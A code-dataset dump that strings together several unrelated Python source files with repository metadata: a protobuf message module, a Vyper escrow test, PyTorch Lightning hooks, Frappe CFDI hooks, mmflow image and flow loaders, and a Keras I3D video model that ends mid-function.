DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/UseItemPotionMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\nBPOGOProtos/Networking/Requests/Messages/UseItemPotionMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\x1a&POGOProtos/Inventory/Item/ItemId.proto\"^\n\x14UseItemPotionMessage\x12\x32\n\x07item_id\x18\x01 \x01(\x0e\x32!.POGOProtos.Inventory.Item.ItemId\x12\x12\n\npokemon_id\x18\x02 \x01(\x04\x62\x06proto3')
,
dependencies=[POGOProtos_dot_Inventory_dot_Item_dot_ItemId__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_USEITEMPOTIONMESSAGE = _descriptor.Descriptor(
name='UseItemPotionMessage',
full_name='POGOProtos.Networking.Requests.Messages.UseItemPotionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='item_id', full_name='POGOProtos.Networking.Requests.Messages.UseItemPotionMessage.item_id', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pokemon_id', full_name='POGOProtos.Networking.Requests.Messages.UseItemPotionMessage.pokemon_id', index=1,
number=2, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=151,
serialized_end=245,
)
_USEITEMPOTIONMESSAGE.fields_by_name['item_id'].enum_type = POGOProtos_dot_Inventory_dot_Item_dot_ItemId__pb2._ITEMID
DESCRIPTOR.message_types_by_name['UseItemPotionMessage'] = _USEITEMPOTIONMESSAGE
UseItemPotionMessage = _reflection.GeneratedProtocolMessageType('UseItemPotionMessage', (_message.Message,), dict(
DESCRIPTOR = _USEITEMPOTIONMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.UseItemPotionMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.UseItemPotionMessage)
))
_sym_db.RegisterMessage(UseItemPotionMessage)
# @@protoc_insertion_point(module_scope)
| 39.3 | 339 | 0.798664 |
77a5d0b4c0d33e28979998af1ae7f7f64b344169 | 1,978 | py | Python | tests/parser/integration/test_escrow.py | lrettig/viper | 4abdd2b59b58fe87ca0aee05c792a6e0363b5358 | [
"MIT"
] | null | null | null | tests/parser/integration/test_escrow.py | lrettig/viper | 4abdd2b59b58fe87ca0aee05c792a6e0363b5358 | [
"MIT"
] | null | null | null | tests/parser/integration/test_escrow.py | lrettig/viper | 4abdd2b59b58fe87ca0aee05c792a6e0363b5358 | [
"MIT"
] | 1 | 2018-09-02T22:47:00.000Z | 2018-09-02T22:47:00.000Z | import pytest
from tests.setup_transaction_tests import chain as s, tester as t, ethereum_utils as u, check_gas, \
get_contract_with_gas_estimation, get_contract
def test_arbitration_code():
arbitration_code = """
buyer: address
seller: address
arbitrator: address
@public
def setup(_seller: address, _arbitrator: address):
if not self.buyer:
self.buyer = msg.sender
self.seller = _seller
self.arbitrator = _arbitrator
@public
def finalize():
assert msg.sender == self.buyer or msg.sender == self.arbitrator
send(self.seller, self.balance)
@public
def refund():
assert msg.sender == self.seller or msg.sender == self.arbitrator
send(self.buyer, self.balance)
"""
c = get_contract_with_gas_estimation(arbitration_code, value=1)
c.setup(t.a1, t.a2, sender=t.k0)
try:
c.finalize(sender=t.k1)
success = True
except:
success = False
assert not success
c.finalize(sender=t.k0)
print('Passed escrow test')
def test_arbitration_code_with_init():
arbitration_code_with_init = """
buyer: address
seller: address
arbitrator: address
@public
@payable
def __init__(_seller: address, _arbitrator: address):
if not self.buyer:
self.buyer = msg.sender
self.seller = _seller
self.arbitrator = _arbitrator
@public
def finalize():
assert msg.sender == self.buyer or msg.sender == self.arbitrator
send(self.seller, self.balance)
@public
def refund():
assert msg.sender == self.seller or msg.sender == self.arbitrator
send(self.buyer, self.balance)
"""
c = get_contract_with_gas_estimation(arbitration_code_with_init,
args=[t.a1, t.a2], sender=t.k0, value=1)
try:
c.finalize(sender=t.k1)
success = True
except t.TransactionFailed:
success = False
assert not success
c.finalize(sender=t.k0)
print('Passed escrow test with initializer')
| 24.725 | 100 | 0.674419 |
4db8366130b20a3d661bcd9dd3541fa1981b2cca | 230 | py | Python | setup.py | mistamun/repo2dockerspawner | fb9cf490735c576eb05d6a086f03d0e5354a2849 | [
"BSD-3-Clause"
] | 5 | 2019-06-16T12:53:24.000Z | 2021-07-27T10:53:30.000Z | setup.py | mistamun/repo2dockerspawner | fb9cf490735c576eb05d6a086f03d0e5354a2849 | [
"BSD-3-Clause"
] | 6 | 2019-05-19T00:16:01.000Z | 2020-09-22T18:39:55.000Z | setup.py | mistamun/repo2dockerspawner | fb9cf490735c576eb05d6a086f03d0e5354a2849 | [
"BSD-3-Clause"
] | 4 | 2019-06-12T14:57:58.000Z | 2019-11-14T20:22:53.000Z | from setuptools import setup, find_packages
setup(
name='jupyterhub-repo2dockerspawner',
version='0.1',
packages=find_packages(),
install_requires=[
'dockerspawner',
'jupyter-repo2docker'
],
)
| 19.166667 | 43 | 0.66087 |
960c7124383b0b311eba34ff2e81bc73715681e1 | 6,881 | py | Python | pytorch_lightning/core/hooks.py | uditarora/pytorch-lightning | 7245e48153909d9de8458b1f5b8b2bc740d80104 | [
"Apache-2.0"
] | null | null | null | pytorch_lightning/core/hooks.py | uditarora/pytorch-lightning | 7245e48153909d9de8458b1f5b8b2bc740d80104 | [
"Apache-2.0"
] | null | null | null | pytorch_lightning/core/hooks.py | uditarora/pytorch-lightning | 7245e48153909d9de8458b1f5b8b2bc740d80104 | [
"Apache-2.0"
] | null | null | null | from typing import Any
import torch
from torch import Tensor
from torch.optim.optimizer import Optimizer
from pytorch_lightning.utilities import move_data_to_device
try:
from apex import amp
except ImportError:
APEX_AVAILABLE = False
else:
APEX_AVAILABLE = True
class ModelHooks(torch.nn.Module):
# TODO: remove in v0.9.0
def on_sanity_check_start(self):
"""
Called before starting evaluation.
Warning:
Deprecated. Will be removed in v0.9.0.
"""
def on_train_start(self) -> None:
"""
Called at the beginning of training before sanity check.
"""
# do something at the start of training
def on_train_end(self) -> None:
"""
Called at the end of training before logger experiment is closed.
"""
# do something at the end of training
def on_batch_start(self, batch: Any) -> None:
"""
Called in the training loop before anything happens for that batch.
If you return -1 here, you will skip training for the rest of the current epoch.
Args:
batch: The batched data as it is returned by the training DataLoader.
"""
# do something when the batch starts
def on_batch_end(self) -> None:
"""
Called in the training loop after the batch.
"""
# do something when the batch ends
def on_epoch_start(self) -> None:
"""
Called in the training loop at the very beginning of the epoch.
"""
# do something when the epoch starts
def on_epoch_end(self) -> None:
"""
Called in the training loop at the very end of the epoch.
"""
# do something when the epoch ends
def on_pre_performance_check(self) -> None:
"""
Called at the very beginning of the validation loop.
"""
# do something before validation starts
def on_post_performance_check(self) -> None:
"""
Called at the very end of the validation loop.
"""
# do something before validation end
def on_before_zero_grad(self, optimizer: Optimizer) -> None:
"""
Called after optimizer.step() and before optimizer.zero_grad().
Called in the training loop after taking an optimizer step and before zeroing grads.
Good place to inspect weight information with weights updated.
This is where it is called::
for optimizer in optimizers:
optimizer.step()
model.on_before_zero_grad(optimizer) # < ---- called here
optimizer.zero_grad
Args:
optimizer: The optimizer for which grads should be zeroed.
"""
# do something with the optimizer or inspect it.
def on_after_backward(self) -> None:
"""
Called in the training loop after loss.backward() and before optimizers do anything.
This is the ideal place to inspect or log gradient information.
Example::
def on_after_backward(self):
# example to inspect gradient information in tensorboard
if self.trainer.global_step % 25 == 0: # don't make the tf file huge
params = self.state_dict()
for k, v in params.items():
grads = v
name = k
self.logger.experiment.add_histogram(tag=name, values=grads,
global_step=self.trainer.global_step)
"""
def backward(self, trainer, loss: Tensor, optimizer: Optimizer, optimizer_idx: int) -> None:
"""
Override backward with your own implementation if you need to.
Args:
trainer: Pointer to the trainer
loss: Loss is already scaled by accumulated grads
optimizer: Current optimizer being used
optimizer_idx: Index of the current optimizer being used
Called to perform backward step.
Feel free to override as needed.
The loss passed in has already been scaled for accumulated gradients if requested.
Example::
def backward(self, use_amp, loss, optimizer):
if use_amp:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
"""
if trainer.precision == 16:
# .backward is not special on 16-bit with TPUs
if trainer.on_tpu:
return
if self.trainer.use_native_amp:
self.trainer.scaler.scale(loss).backward()
# TODO: remove in v0.8.0
else:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
def transfer_batch_to_device(self, batch: Any, device: torch.device) -> Any:
"""
Override this hook if your :class:`~torch.utils.data.DataLoader` returns tensors
wrapped in a custom data structure.
The data types listed below (and any arbitrary nesting of them) are supported out of the box:
- :class:`torch.Tensor`
- :class:`list`
- :class:`dict`
- :class:`tuple`
- ``torchtext.data.Batch`` (COMING SOON)
For anything else, you need to define how the data is moved to the target device (CPU, GPU, TPU, ...).
Example::
def transfer_batch_to_device(self, batch, device)
if isinstance(batch, CustomBatch):
# move all tensors in your custom data structure to the device
batch.samples = batch.samples.to(device)
batch.targets = batch.targets.to(device)
else:
batch = super().transfer_batch_to_device(data, device)
return batch
Args:
batch: A batch of data that needs to be transferred to a new device.
device: The target device as defined in PyTorch.
Returns:
A reference to the data on the new device.
Note:
This hook should only transfer the data and not modify it, nor should it move the data to
any other device than the one passed in as argument (unless you know what you are doing).
The :class:`~pytorch_lightning.trainer.trainer.Trainer` already takes care of splitting the
batch and determines the target devices.
See Also:
- :func:`~pytorch_lightning.utilities.apply_func.move_data_to_device`
- :func:`~pytorch_lightning.utilities.apply_func.apply_to_collection`
"""
return move_data_to_device(batch, device)
| 33.896552 | 110 | 0.593518 |
4c2ce44786720c852df419782722893edd9718e9 | 4,169 | py | Python | cfdi/hooks.py | dacosta2213/cfdi | d383940cb1b333207fce9c2e70d55907dd441ca1 | [
"MIT"
] | null | null | null | cfdi/hooks.py | dacosta2213/cfdi | d383940cb1b333207fce9c2e70d55907dd441ca1 | [
"MIT"
] | null | null | null | cfdi/hooks.py | dacosta2213/cfdi | d383940cb1b333207fce9c2e70d55907dd441ca1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
app_name = "cfdi"
app_title = "Cfdi"
app_publisher = "CODIGO BINARIO"
app_description = "CFDI for Frappe"
app_icon = " 'octicon octicon-file-binary'"
app_color = " 'octicon octicon-file-binary' , icon color: #2488ee"
app_email = "soporte@posix.mx"
app_license = "MIT"
# RG- 24-Jul-2019 - Quite Print Format (son nativos), Translation y UOM porque nomas chocaban con las instalaciones de los clientes
fixtures = [
# "CFDI Clave Producto",
# "CFDI Regimen Fiscal",
# "CFDI Uso",
# "Configuracion CFDI",
# "CFDI Metodo Pago",
# "CFDI Tipo De Comprobante",
# "CFDI Forma de Pago",
# "CFDI Clave Unidad",
# "CFDI Relacion Documentos",
# Para mover todos los cambios de una instancia a otra
# {"dt":"Custom Field", "filters": [["dt", "in", ("Sales Invoice", "Sales Invoice Item","Item","User", "Customer", "Address","Payment Entry","Payment Entry Reference")]]},
# {"dt":"Property Setter", "filters": [["doc_type", "in", ("Customize Form Field","Opportunity","Sales Invoice", "Sales Invoice Item", "Item","User", "Customer", "Address","Payment Entry Reference")]]},
# Solo cambios que impacten payment entry
{"dt":"Custom Field", "filters": [ ["dt", "in", ("Sales Invoice","CFDI Nota de Credito","Payment Entry","Payment Entry Reference")] ]},
{"dt":"Property Setter", "filters": [["doc_type", "in", ("Sales Invoice","CFDI Nota de Credito","Payment Entry","Payment Entry Reference")] ]},
]
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/cfdi/css/cfdi.css"
# app_include_js = "/assets/cfdi/js/cfdi.js"
# include js, css files in header of web template
# web_include_css = "/assets/cfdi/css/cfdi.css"
# web_include_js = "/assets/cfdi/js/cfdi.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
doctype_js = {
"Sales Invoice" : "public/js/cfdi_sales_invoice.js",
"Payment Entry" : "public/js/payment_entry_client.js",
"CFDI Nota de Credito" : "public/js/cfdi_nota_de_credito.js",
"Delivery Trip" : "public/js/delivery_trip.js"
}
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "cfdi.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "cfdi.install.before_install"
# after_install = "cfdi.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "cfdi.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
doc_events = {
"Payment Entry": {
"on_update": "cfdi.cfdi.doctype.cfdi.cfdi.parcialidades_pe"
}
}
# Scheduled Tasks
# ---------------
# scheduler_events = {
# "all": [
# "cfdi.tasks.all"
# ],
# "daily": [
# "cfdi.tasks.daily"
# ],
# "hourly": [
# "cfdi.tasks.hourly"
# ],
# "weekly": [
# "cfdi.tasks.weekly"
# ]
# "monthly": [
# "cfdi.tasks.monthly"
# ]
# }
# Testing
# -------
# before_tests = "cfdi.install.before_tests"
# Overriding Whitelisted Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "cfdi.event.get_events"
# }
| 28.751724 | 206 | 0.65987 |
e964ed3c609b1eb1fe5be7276a6692f85571f9fd | 9,756 | py | Python | mmflow/datasets/pipelines/loading.py | ArlenCHEN/mmflow | 8e26e8dd049376d90c569ab6009c36b9af11ff10 | [
"Apache-2.0"
] | null | null | null | mmflow/datasets/pipelines/loading.py | ArlenCHEN/mmflow | 8e26e8dd049376d90c569ab6009c36b9af11ff10 | [
"Apache-2.0"
] | null | null | null | mmflow/datasets/pipelines/loading.py | ArlenCHEN/mmflow | 8e26e8dd049376d90c569ab6009c36b9af11ff10 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) OpenMMLab. All rights reserved.
import os.path as osp
import mmcv
import numpy as np
from mmcv import flow_from_bytes, sparse_flow_from_bytes
from ..builder import PIPELINES
from ..utils import read_pfm
@PIPELINES.register_module()
class LoadImageFromFile:
"""Load image1 and image2 from file.
Required keys are "img1_info" (dict that must contain the key "filename"
and "filename2"). Added or updated keys are "img1", "img2", "img_shape",
"ori_shape" (same as `img_shape`), "pad_shape" (same as `img_shape`),
"scale_factor" (1.0, 1.0) and "img_norm_cfg" (means=0 and stds=1).
Args:
to_float32 (bool): Whether to convert the loaded image to a float32
numpy array. If set to False, the loaded image is an uint8 array.
Defaults to False.
color_type (str): The flag argument for :func:`mmcv.imfrombytes`.
Defaults to 'color'.
file_client_args (dict): Arguments to instantiate a FileClient.
See :class:`mmcv.fileio.FileClient` for details.
Defaults to ``dict(backend='disk')``.
imdecode_backend (str): Backend for :func:`mmcv.imdecode`. Default:
'cv2'
"""
def __init__(self,
to_float32: bool = False,
color_type: str = 'color',
file_client_args: dict = dict(backend='disk'),
imdecode_backend: str = 'cv2') -> None:
super().__init__()
self.to_float32 = to_float32
self.color_type = color_type
self.file_client_args = file_client_args
self.file_client = None
self.imdecode_backend = imdecode_backend
def __call__(self, results: dict) -> dict:
"""Call function to load image and get image meta information.
Args:
results (dict): Result dict from :obj:`mmflow.BaseDataset`.
Returns:
dict: The dict contains loaded image and meta information.
"""
if self.file_client is None:
self.file_client = mmcv.FileClient(**self.file_client_args)
filename1 = results['img_info']['filename1']
filename2 = results['img_info']['filename2']
if (not osp.isfile(filename1)) or (not osp.isfile(filename2)):
raise RuntimeError(
f'Cannot load file from {filename1} or {filename2}')
img1_bytes = self.file_client.get(filename1)
img2_bytes = self.file_client.get(filename2)
input_size = results['input_size']
img1 = mmcv.imfrombytes(
img1_bytes, input_size, flag=self.color_type, backend=self.imdecode_backend)
img2 = mmcv.imfrombytes(
img2_bytes, input_size, flag=self.color_type, backend=self.imdecode_backend)
assert img1 is not None
if self.to_float32:
img1 = img1.astype(np.float32)
img2 = img2.astype(np.float32)
results['filename1'] = filename1
results['filename2'] = filename2
results['ori_filename1'] = osp.split(filename1)[-1]
results['ori_filename2'] = osp.split(filename2)[-1]
results['img1'] = img1
results['img2'] = img2
results['img_shape'] = img1.shape
results['ori_shape'] = img1.shape
# Set initial values for default meta_keys
results['pad_shape'] = img1.shape
results['scale_factor'] = np.array([1.0, 1.0])
num_channels = 1 if len(img1.shape) < 3 else img1.shape[2]
results['img_norm_cfg'] = dict(
mean=np.zeros(num_channels, dtype=np.float32),
std=np.ones(num_channels, dtype=np.float32),
to_rgb=False)
return results
def __repr__(self) -> str:
repr_str = self.__class__.__name__
repr_str += f'(to_float32={self.to_float32},'
repr_str += f"color_type='{self.color_type}',"
repr_str += f"imdecode_backend='{self.imdecode_backend}')"
return repr_str
@PIPELINES.register_module()
class LoadAnnotations:
"""Load optical flow from file.
Args:
with_occ (bool): whether to parse and load occlusion mask.
Default to False.
sparse (bool): whether the flow is sparse. Default to False.
file_client_args (dict): Arguments to instantiate a FileClient.
See :class:`mmcv.fileio.FileClient` for details.
Defaults to ``dict(backend='disk')``.
"""
def __init__(
self,
with_occ: bool = False,
sparse: bool = False,
file_client_args: dict = dict(backend='disk'),
) -> None:
self.with_occ = with_occ
self.sparse = sparse
self.file_client_args = file_client_args
self.file_client = None
def __call__(self, results: dict) -> dict:
"""Call function to load optical flow and occlusion mask (optional).
Args:
results (dict): Result dict from :obj:`mmflow.BaseDataset`.
Returns:
dict: The dict contains loaded annotation data.
"""
if self.file_client is None:
self.file_client = mmcv.FileClient(**self.file_client_args)
if self.sparse:
results = self._load_sparse_flow(results)
else:
results = self._load_flow(results)
if self.with_occ:
results = self._load_occ(results)
return results
def _load_flow(self, results: dict) -> dict:
"""load dense optical flow function.
Args:
results (dict): Result dict from :obj:`mmflow.BaseDataset`.
Returns:
dict: The dict contains loaded annotation data.
"""
filenames = list(results['ann_info'].keys())
skip_len = len('filename_')
for filename in filenames:
if filename.find('flow') > -1:
filename_flow = results['ann_info'][filename]
if filename_flow.endswith('pfm'):
# files with .pfm do not support file_client
flow = read_pfm(filename_flow)
else:
flow_bytes = self.file_client.get(filename_flow)
flow = flow_from_bytes(flow_bytes)
results[filename] = filename_flow
results['ori_' + filename] = osp.split(filename_flow)[-1]
ann_key = filename[skip_len:] + '_gt'
results[ann_key] = flow
results['ann_fields'].append(ann_key)
return results
def _load_sparse_flow(self, results: dict) -> dict:
"""load sparse optical flow function.
Args:
results (dict): Result dict from :obj:`mmflow.BaseDataset`.
Returns:
dict: The dict contains loaded annotation data.
"""
filenames = list(results['ann_info'].keys())
skip_len = len('filename_')
for filename in filenames:
if filename.find('flow') > -1:
filename_flow = results['ann_info'][filename]
flow_bytes = self.file_client.get(filename_flow)
flow, valid = sparse_flow_from_bytes(flow_bytes)
results[filename] = filename_flow
results['ori_' + filename] = osp.split(filename_flow)[-1]
ann_key = filename[skip_len:] + '_gt'
# sparse flow dataset don't include backward flow
results['valid'] = valid
results[ann_key] = flow
results['ann_fields'].append(ann_key)
return results
def _load_occ(self, results: dict) -> dict:
"""load annotation function.
Args:
results (dict): Result dict from :obj:`mmflow.BaseDataset`.
Returns:
dict: The dict contains loaded annotation data.
"""
filenames = list(results['ann_info'].keys())
skip_len = len('filename_')
for filename in filenames:
if filename.find('occ') > -1:
filename_occ = results['ann_info'][filename]
occ_bytes = self.file_client.get(filename_occ)
occ = (mmcv.imfrombytes(occ_bytes, flag='grayscale') /
255).astype(np.float32)
results[filename] = filename_occ
results['ori_' + filename] = osp.split(filename_occ)[-1]
ann_key = filename[skip_len:] + '_gt'
results[ann_key] = occ
results['ann_fields'].append(ann_key)
return results
@PIPELINES.register_module()
class LoadImageFromWebcam(LoadImageFromFile):
"""Load an image from webcam.
Similar with :obj:`LoadImageFromFile`, but the image read from webcam is in
``results['img']``.
"""
def __call__(self, results: dict) -> dict:
"""Call function to add image meta information.
Args:
results (dict): Result dict with Webcam read image in
``results['img']``.
Returns:
dict: The dict contains loaded image and meta information.
"""
img1 = results['img1']
img2 = results['img2']
if self.to_float32:
img1 = img1.astype(np.float32)
img2 = img2.astype(np.float32)
results['filename1'] = None
results['ori_filename1'] = None
results['filename2'] = None
results['ori_filename2'] = None
results['img1'] = img1
results['img2'] = img2
results['img_shape'] = img1.shape
results['ori_shape'] = img1.shape
results['img_fields'] = ['img1', 'img2']
# Set initial values for default meta_keys
results['pad_shape'] = img1.shape
results['scale_factor'] = np.array([1.0, 1.0])
return results
| 34.111888 | 88 | 0.590816 |
dd2cd398e4e139e6809f456add9a00eb17f4537d | 3,436 | py | Python | iaso/analysis/__init__.py | identifiers-org/cmd-iaso | 18d9fb8cab2361eebe9102873eaac991126ee940 | [
"MIT"
] | null | null | null | iaso/analysis/__init__.py | identifiers-org/cmd-iaso | 18d9fb8cab2361eebe9102873eaac991126ee940 | [
"MIT"
] | 2 | 2020-07-29T07:34:14.000Z | 2020-09-03T10:04:31.000Z | iaso/analysis/__init__.py | identifiers-org/cmd-iaso | 18d9fb8cab2361eebe9102873eaac991126ee940 | [
"MIT"
] | null | null | null | import gc
import json
import os
import re
import signal
import time
from functools import partial
from multiprocessing import Pipe, Process
from pathlib import Path
from tqdm import tqdm
from .common_fragments import extract_common_fragments_per_lui
from .shared_fragments import extract_shared_fragments_from_tree
from .suffix_tree import extract_shared_suffix_tree
PINGS_PATTERN = re.compile(r"pings_(\d+)\.gz")
class IPCProxy:
def __init__(self, name, pipe):
self.name = name
self.pipe = pipe
def __call_proxy(self, method, *args, **kwargs):
self.pipe.send((self.name, method, args, kwargs))
def __getattr__(self, attr):
return partial(self.__call_proxy, attr)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.pipe.close()
def analyse_single_file_worker(outer_progress, inner_progress, filepath, rid, datamine):
with outer_progress, inner_progress:
outer_progress.set_postfix({"rid": rid})
luis, common_fragments_per_lui = extract_common_fragments_per_lui(
inner_progress, filepath
)
common_lengths = [len(fragments) for fragments in common_fragments_per_lui]
common_noise = [
fragments.count("NOISE") for fragments in common_fragments_per_lui
]
gc.collect()
tree = extract_shared_suffix_tree(
outer_progress, inner_progress, rid, luis, common_fragments_per_lui
)
del common_fragments_per_lui
gc.collect()
shared_fragments = extract_shared_fragments_from_tree(
outer_progress, inner_progress, rid, luis, tree
)
del tree
gc.collect()
datamine.write("[")
append_analysis = False
for l, (lui, fragments) in enumerate(zip(luis, shared_fragments)):
L = common_lengths[l]
if L == 0:
continue
C = sum(len(fragment) for fragment in fragments)
n = len(fragments)
info = (L - C + n - 1.0) / L
if append_analysis:
datamine.write(", ")
json.dump(
{
"lui": lui,
"information_content": round(info, 5),
"length": L,
"noise": common_noise[l],
},
datamine,
)
append_analysis = True
datamine.write("]")
def analyse_single_file(
datamine, subdir, outer_progress, inner_progress, filename, rid
):
pipe_read, pipe_write = Pipe(False)
process = Process(
target=analyse_single_file_worker,
args=(
IPCProxy("outer_progress", pipe_write),
IPCProxy("inner_progress", pipe_write),
subdir / filename,
rid,
IPCProxy("datamine", pipe_write),
),
)
process.start()
pipe_write.close()
proxies = {
"outer_progress": outer_progress,
"inner_progress": inner_progress,
"datamine": datamine,
}
while True:
try:
(proxy_name, method, args, kwargs) = pipe_read.recv()
getattr(proxies[proxy_name], method)(*args, **kwargs)
except EOFError:
break
inner_progress.set_description("Finalising resource analysis")
inner_progress.reset(total=1)
process.join()
| 24.542857 | 88 | 0.605646 |
061fcd31c92492ec6f44aa73d711746a02407dba | 14,810 | py | Python | model_i3d.py | SocialHelpers/Inception3d_for_Indian_Sign_language | c48cd95fd1b87b25ba5aba6da12f9bf7462311bf | [
"MIT"
] | 1 | 2019-11-02T19:04:49.000Z | 2019-11-02T19:04:49.000Z | model_i3d.py | SocialHelpers/Inception3d_for_Indian_Sign_language | c48cd95fd1b87b25ba5aba6da12f9bf7462311bf | [
"MIT"
] | 4 | 2019-11-04T11:21:59.000Z | 2022-02-09T23:33:12.000Z | model_i3d.py | SocialHelpers/Inception3d_for_Indian_Sign_language | c48cd95fd1b87b25ba5aba6da12f9bf7462311bf | [
"MIT"
] | 3 | 2019-09-16T15:51:07.000Z | 2022-03-16T10:18:01.000Z | """
Keras implementation of
Inception-v1 Inflated 3D ConvNet used for Kinetics CVPR paper and introduced in
"Quo Vadis, Action Recognition? A New Model and the Kinetics Dataset" by
Joao Carreira, Andrew Zisserman
https://arxiv.org/abs/1705.07750v1
"""
from __future__ import print_function
from __future__ import absolute_import
import os
from keras.models import Model, load_model
from keras import layers
from keras.layers import Activation
from keras.layers import Input
from keras.layers import BatchNormalization
from keras.layers import Conv3D
from keras.layers import MaxPooling3D
from keras.layers import AveragePooling3D
from keras.layers import Dropout
from keras.layers import Reshape
from keras.layers import Lambda
from keras.utils.data_utils import get_file
from keras import backend as K
def conv3d_bn(x,
filters,
num_frames,
num_row,
num_col,
padding='same',
strides=(1, 1, 1),
use_bias=False,
use_activation_fn=True,
use_bn=True,
name=None):
"""
Utility function to apply conv3d + BN.
:return: Output tensor after applying `Conv3D` and `BatchNormalization`.
"""
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
x = Conv3D(
filters, (num_frames, num_row, num_col),
strides=strides,
padding=padding,
use_bias=use_bias,
name=conv_name)(x)
if use_bn:
if K.image_data_format() == 'channels_first':
bn_axis = 1
else:
bn_axis = 4
x = BatchNormalization(axis=bn_axis, scale=False, name=bn_name)(x)
if use_activation_fn:
x = Activation('relu', name=name)(x)
return x
def Inception_Inflated3d_Top(input_shape, classes, dropout_prob):
"""
Returns adjusted top layers for I3D model, depending on the number of output classes.
"""
inputs = Input(shape=input_shape, name="input")
x = Dropout(dropout_prob)(inputs)
x = conv3d_bn(x, classes, 1, 1, 1, padding='same',
use_bias=True, use_activation_fn=False, use_bn=False, name='Conv3d_6a_1x1')
num_frames_remaining = int(x.shape[1])
x = Reshape((num_frames_remaining, classes))(x)
x = Lambda(lambda x: K.mean(x, axis=1, keepdims=False),
output_shape=lambda s: (s[0], s[2]))(x)
x = Activation('softmax', name='prediction')(x)
keModel = Model(inputs=inputs, outputs=x, name="i3d_top")
return keModel
def add_i3d_top(base_model: Model, classes: int, dropout_prob: bool) -> Model:
""" Given an I3D model (without top layers), this function creates the top layers
depending on the number of output classes, and returns the entire model.
"""
top_model = Inception_Inflated3d_Top(base_model.output_shape[1:], classes, dropout_prob)
x = base_model.output
predictions = top_model(x)
new_model = Model(inputs=base_model.input, output=predictions, name="i3d_with_top")
return new_model
def I3D_load(sPath, nFramesNorm, tuImageShape, nClasses):
"""
Keras load_model plus input & output shape validation.
"""
print("Load trained I3D model from %s ..." % sPath)
keModel = load_model(sPath)
tuInputShape = keModel.input_shape[1:]
tuOutputShape = keModel.output_shape[1:]
print("Loaded input shape %s, output shape %s" % (str(tuInputShape), str(tuOutputShape)))
if tuInputShape != ((nFramesNorm,) + tuImageShape):
raise ValueError("Unexpected I3D input shape")
if tuOutputShape != (nClasses,):
raise ValueError("Unexpected I3D output shape")
return keModel
def Inception_Inflated3d(include_top=True,
weights=None,
input_tensor=None,
input_shape=None,
dropout_prob=0.0,
endpoint_logit=True,
classes=400):
"""
Instantiates the Inception i3D Inception v1 architecture.
:return: Inception i3D model model.
"""
WEIGHTS_NAME = ['flow_imagenet_and_kinetics']
# path to pretrained models with top (classification layer)
WEIGHTS_PATH = {
'flow_imagenet_and_kinetics': 'https://github.com/dlpbc/keras-kinetics-i3d/releases/download/v0.2/flow_inception_i3d_imagenet_and_kinetics_tf_dim_ordering_tf_kernels.h5'
}
# path to pretrained models with no top (no classification layer)
WEIGHTS_PATH_NO_TOP = {
'flow_imagenet_and_kinetics': 'https://github.com/dlpbc/keras-kinetics-i3d/releases/download/v0.2/flow_inception_i3d_imagenet_and_kinetics_tf_dim_ordering_tf_kernels_no_top.h5'
}
if not (weights in WEIGHTS_NAME or weights is None or os.path.exists(weights)):
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or %s' %
str(WEIGHTS_NAME) + ' '
'or a valid path to a file containing `weights` values')
input_shape = input_shape
img_input = Input(shape=input_shape)
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = 4
# Downsampling via convolution (spatial and temporal)
x = conv3d_bn(img_input, 64, 7, 7, 7, strides=(2, 2, 2), padding='same', name='Conv3d_1a_7x7')
# Downsampling (spatial only)
x = MaxPooling3D((1, 3, 3), strides=(1, 2, 2), padding='same', name='MaxPool2d_2a_3x3')(x)
x = conv3d_bn(x, 64, 1, 1, 1, strides=(1, 1, 1), padding='same', name='Conv3d_2b_1x1')
x = conv3d_bn(x, 192, 3, 3, 3, strides=(1, 1, 1), padding='same', name='Conv3d_2c_3x3')
# Downsampling (spatial only)
